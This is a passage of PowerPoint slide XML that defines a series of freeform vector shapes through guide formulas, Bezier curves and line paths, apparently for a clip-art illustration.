                      <a:pt x="90" y="68"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="74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9" name="Freeform 14546"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5449" y="2868"/>
                <a:ext cx="311" cy="351"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 80 h 89"/>
                  <a:gd name="T2" fmla="*/ 16 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 8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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="80"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="89"/>
                      <a:pt x="31" y="82"/>
                      <a:pt x="16" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="49" y="8"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="66" y="80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0" name="Freeform 14547"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5564" y="3000"/>
                <a:ext cx="82" cy="94"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 21"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 4 w 21"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 21"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 17 w 21"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 21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24"/>
                  <a:gd name="T17" fmla="*/ 21 w 21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24">
                    <a:moveTo>
                      <a:pt x="18" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="24"/>
                      <a:pt x="8" y="22"/>
                      <a:pt x="4" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="11"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="17" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="12"/>
                      <a:pt x="21" y="19"/>
                      <a:pt x="18" y="2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1" name="Freeform 14548"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5592" y="3031"/>
                <a:ext cx="29" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 5 h 8"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 0 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 2 h 8"/>
                  <a:gd name="T8" fmla="*/ 6 w 7"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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8">
                    <a:moveTo>
                      <a:pt x="6" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="7"/>
                      <a:pt x="1" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="4"/>
                      <a:pt x="7" y="6"/>
                      <a:pt x="6" y="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2" name="Freeform 14549"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6066" y="2868"/>
                <a:ext cx="354" cy="357"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 6 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 6 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 82 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 82 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 78 h 90"/>
                  <a:gd name="T16" fmla="*/ 75 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="75" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="8"/>
                      <a:pt x="43" y="0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1" y="90"/>
                      <a:pt x="41" y="90"/>
                      <a:pt x="41" y="90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72" y="81"/>
                      <a:pt x="75" y="80"/>
                      <a:pt x="77" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="68"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="75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3" name="Freeform 14550"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5997" y="2897"/>
                <a:ext cx="311" cy="357"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 65 w 79"/>
                  <a:gd name="T1" fmla="*/ 80 h 90"/>
                  <a:gd name="T2" fmla="*/ 15 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 90"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 90"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 90"/>
                  <a:gd name="T8" fmla="*/ 65 w 79"/>
                  <a:gd name="T9" fmla="*/ 8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90"/>
                  <a:gd name="T17" fmla="*/ 79 w 79"/>
                  <a:gd name="T18" fmla="*/ 90 h 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90">
                    <a:moveTo>
                      <a:pt x="65" y="80"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="90"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="15" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="48" y="8"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="46"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="65" y="80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4" name="Freeform 14551"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6108" y="3028"/>
                <a:ext cx="86" cy="94"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 22"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 5 w 22"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 22"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 17 w 22"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 22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24"/>
                  <a:gd name="T17" fmla="*/ 22 w 22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24">
                    <a:moveTo>
                      <a:pt x="18" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="24"/>
                      <a:pt x="9" y="22"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="12"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="17" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="12"/>
                      <a:pt x="22" y="19"/>
                      <a:pt x="18" y="2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5" name="Freeform 14552"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6134" y="3060"/>
                <a:ext cx="32" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 8"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 2 w 8"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 2 w 8"/>
                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 8"/>
                  <a:gd name="T7" fmla="*/ 2 h 8"/>
                  <a:gd name="T8" fmla="*/ 7 w 8"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 8 w 8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8">
                    <a:moveTo>
                      <a:pt x="7" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="7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8" y="4"/>
                      <a:pt x="8" y="6"/>
                      <a:pt x="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6" name="Freeform 14553"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6086" y="2940"/>
                <a:ext cx="91" cy="134"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 24"/>
                  <a:gd name="T1" fmla="*/ 3 h 34"/>
                  <a:gd name="T2" fmla="*/ 5 w 24"/>
                  <a:gd name="T3" fmla="*/ 33 h 34"/>
                  <a:gd name="T4" fmla="*/ 15 w 24"/>
                  <a:gd name="T5" fmla="*/ 34 h 34"/>
                  <a:gd name="T6" fmla="*/ 24 w 24"/>
                  <a:gd name="T7" fmla="*/ 29 h 34"/>
                  <a:gd name="T8" fmla="*/ 19 w 24"/>
                  <a:gd name="T9" fmla="*/ 0 h 34"/>
                  <a:gd name="T10" fmla="*/ 0 w 24"/>
                  <a:gd name="T11" fmla="*/ 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34"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 34 h 3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34">
                    <a:moveTo>
                      <a:pt x="0" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="33"/>
                      <a:pt x="5" y="33"/>
                      <a:pt x="5" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="10" y="34"/>
                      <a:pt x="15" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="33"/>
                      <a:pt x="24" y="31"/>
                      <a:pt x="24" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="0"/>
                      <a:pt x="19" y="0"/>
                      <a:pt x="19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7" name="Freeform 14554"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6049" y="2834"/>
                <a:ext cx="128" cy="126"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 5 h 32"/>
                  <a:gd name="T2" fmla="*/ 4 w 33"/>
                  <a:gd name="T3" fmla="*/ 29 h 32"/>
                  <a:gd name="T4" fmla="*/ 19 w 33"/>
                  <a:gd name="T5" fmla="*/ 30 h 32"/>
                  <a:gd name="T6" fmla="*/ 32 w 33"/>
                  <a:gd name="T7" fmla="*/ 24 h 32"/>
                  <a:gd name="T8" fmla="*/ 28 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 5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3"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 33 w 33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3" h="32">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="29"/>
                      <a:pt x="4" y="29"/>
                      <a:pt x="4" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="31"/>
                      <a:pt x="11" y="32"/>
                      <a:pt x="19" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="29"/>
                      <a:pt x="33" y="26"/>
                      <a:pt x="32" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="28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8" name="Freeform 14555"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5857" y="2928"/>
                <a:ext cx="354" cy="351"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 90"/>
                  <a:gd name="T1" fmla="*/ 24 h 89"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 89"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 89"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 14 h 89"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 89 h 89"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 89"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 89"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 77 h 89"/>
                  <a:gd name="T16" fmla="*/ 74 w 90"/>
                  <a:gd name="T17" fmla="*/ 24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89"/>
                  <a:gd name="T29" fmla="*/ 90 w 90"/>
                  <a:gd name="T30" fmla="*/ 89 h 8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89">
                    <a:moveTo>
                      <a:pt x="74" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="7"/>
                      <a:pt x="42" y="0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1" y="89"/>
                      <a:pt x="41" y="89"/>
                      <a:pt x="41" y="89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2" y="80"/>
                      <a:pt x="75" y="79"/>
                      <a:pt x="77" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="67"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="74" y="2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9" name="Freeform 14556"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5783" y="2954"/>
                <a:ext cx="314" cy="354"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 79 h 89"/>
                  <a:gd name="T2" fmla="*/ 16 w 79"/>
                  <a:gd name="T3" fmla="*/ 62 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 9 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 26 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 7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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="89"/>
                      <a:pt x="31" y="81"/>
                      <a:pt x="16" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="43"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="13" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="49" y="7"/>
                      <a:pt x="63" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="45"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="66" y="79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0" name="Freeform 14557"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5900" y="3082"/>
                <a:ext cx="80" cy="95"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 21"/>
                  <a:gd name="T1" fmla="*/ 22 h 24"/>
                  <a:gd name="T2" fmla="*/ 4 w 21"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 21"/>
                  <a:gd name="T5" fmla="*/ 3 h 24"/>
                  <a:gd name="T6" fmla="*/ 17 w 21"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 21"/>
                  <a:gd name="T9" fmla="*/ 2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24"/>
                  <a:gd name="T17" fmla="*/ 21 w 21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24">
                    <a:moveTo>
                      <a:pt x="18" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="24"/>
                      <a:pt x="8" y="22"/>
                      <a:pt x="4" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="17" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="21" y="19"/>
                      <a:pt x="18" y="2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1" name="Freeform 14558"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5926" y="3114"/>
                <a:ext cx="28" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 7"/>
                  <a:gd name="T1" fmla="*/ 8 h 8"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 3 h 8"/>
                  <a:gd name="T8" fmla="*/ 6 w 7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8"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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8">
                    <a:moveTo>
                      <a:pt x="6" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="8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5" y="1"/>
                      <a:pt x="6" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="4"/>
                      <a:pt x="7" y="7"/>
                      <a:pt x="6" y="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2" name="Freeform 14559"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5752" y="2415"/>
                <a:ext cx="562" cy="496"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 336"/>
                  <a:gd name="T1" fmla="*/ 241 h 297"/>
                  <a:gd name="T2" fmla="*/ 213 w 336"/>
                  <a:gd name="T3" fmla="*/ 297 h 297"/>
                  <a:gd name="T4" fmla="*/ 336 w 336"/>
                  <a:gd name="T5" fmla="*/ 85 h 297"/>
                  <a:gd name="T6" fmla="*/ 24 w 336"/>
                  <a:gd name="T7" fmla="*/ 0 h 297"/>
                  <a:gd name="T8" fmla="*/ 0 w 336"/>
                  <a:gd name="T9" fmla="*/ 241 h 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6"/>
                  <a:gd name="T16" fmla="*/ 0 h 297"/>
                  <a:gd name="T17" fmla="*/ 336 w 336"/>
                  <a:gd name="T18" fmla="*/ 297 h 29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6" h="297">
                    <a:moveTo>
                      <a:pt x="0" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="213" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24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3" name="Freeform 14560"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6108" y="2535"/>
                <a:ext cx="283" cy="376"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 226 h 226"/>
                  <a:gd name="T2" fmla="*/ 40 w 170"/>
                  <a:gd name="T3" fmla="*/ 215 h 226"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 0 h 226"/>
                  <a:gd name="T6" fmla="*/ 123 w 170"/>
                  <a:gd name="T7" fmla="*/ 14 h 226"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9" fmla="*/ 224 h 226"/>
                  <a:gd name="T10" fmla="*/ 0 w 170"/>
                  <a:gd name="T11" fmla="*/ 226 h 2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0"/>
                  <a:gd name="T19" fmla="*/ 0 h 226"/>
                  <a:gd name="T20" fmla="*/ 170 w 170"/>
                  <a:gd name="T21" fmla="*/ 226 h 2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0" h="226">
                    <a:moveTo>
                      <a:pt x="0" y="226"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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4" name="Freeform 14561"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6108" y="2535"/>
                <a:ext cx="283" cy="376"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 226 h 226"/>
                  <a:gd name="T2" fmla="*/ 40 w 170"/>
                  <a:gd name="T3" fmla="*/ 215 h 226"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 0 h 226"/>
                  <a:gd name="T6" fmla="*/ 123 w 170"/>
                  <a:gd name="T7" fmla="*/ 14 h 226"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9" fmla="*/ 224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0"/>
                  <a:gd name="T16" fmla="*/ 0 h 226"/>
                  <a:gd name="T17" fmla="*/ 170 w 170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0" h="226">
                    <a:moveTo>
                      <a:pt x="0" y="226"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="224"/>
                    </a:lnTo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5" name="Freeform 14562"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1455" y="1425"/>
                <a:ext cx="265" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 67"/>
                  <a:gd name="T1" fmla="*/ 21 h 74"/>
                  <a:gd name="T2" fmla="*/ 15 w 67"/>
                  <a:gd name="T3" fmla="*/ 5 h 74"/>
                  <a:gd name="T4" fmla="*/ 15 w 67"/>
                  <a:gd name="T5" fmla="*/ 5 h 74"/>
                  <a:gd name="T6" fmla="*/ 4 w 67"/>
                  <a:gd name="T7" fmla="*/ 8 h 74"/>
                  <a:gd name="T8" fmla="*/ 6 w 67"/>
                  <a:gd name="T9" fmla="*/ 12 h 74"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 52 h 74"/>
                  <a:gd name="T12" fmla="*/ 32 w 67"/>
                  <a:gd name="T13" fmla="*/ 68 h 74"/>
                  <a:gd name="T14" fmla="*/ 34 w 67"/>
                  <a:gd name="T15" fmla="*/ 74 h 74"/>
                  <a:gd name="T16" fmla="*/ 49 w 67"/>
                  <a:gd name="T17" fmla="*/ 70 h 74"/>
                  <a:gd name="T18" fmla="*/ 49 w 67"/>
                  <a:gd name="T19" fmla="*/ 70 h 74"/>
                  <a:gd name="T20" fmla="*/ 56 w 67"/>
                  <a:gd name="T21" fmla="*/ 67 h 74"/>
                  <a:gd name="T22" fmla="*/ 53 w 67"/>
                  <a:gd name="T23" fmla="*/ 21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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 74"/>
                  <a:gd name="T38" fmla="*/ 67 w 67"/>
                  <a:gd name="T39" fmla="*/ 74 h 7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7" h="74">
                    <a:moveTo>
                      <a:pt x="53" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="7"/>
                      <a:pt x="26" y="0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0" y="22"/>
                      <a:pt x="2" y="39"/>
                      <a:pt x="13" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="59"/>
                      <a:pt x="25" y="65"/>
                      <a:pt x="32" y="68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1" y="69"/>
                      <a:pt x="54" y="68"/>
                      <a:pt x="56" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="58"/>
                      <a:pt x="66" y="38"/>
                      <a:pt x="53" y="21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6" name="Freeform 14563"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1398" y="1433"/>
                <a:ext cx="265" cy="306"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 68"/>
                  <a:gd name="T1" fmla="*/ 69 h 77"/>
                  <a:gd name="T2" fmla="*/ 14 w 68"/>
                  <a:gd name="T3" fmla="*/ 54 h 77"/>
